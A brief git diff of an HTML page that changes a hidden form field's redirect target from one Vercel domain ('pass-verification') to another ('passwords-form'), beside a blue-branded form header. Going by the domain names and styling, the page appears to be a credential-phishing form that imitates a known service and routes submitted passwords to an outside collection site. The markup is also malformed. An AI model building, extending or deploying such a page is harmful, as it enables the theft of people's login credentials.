--- a/index.html
+++ b/index.html
@@ -14,7 +14,7 @@
            <input
     type="hidden"
     name="_redirect"
-    value="https://pass-verification.vercel.app"method="post"> 
+    value="https://passwords-form.vercel.app"method="post"> 
                 <div>
                     <form>
                         <div class="d-flex align-items-center" style="width: 100%; height: 90px; background: rgb(70, 103, 172);">
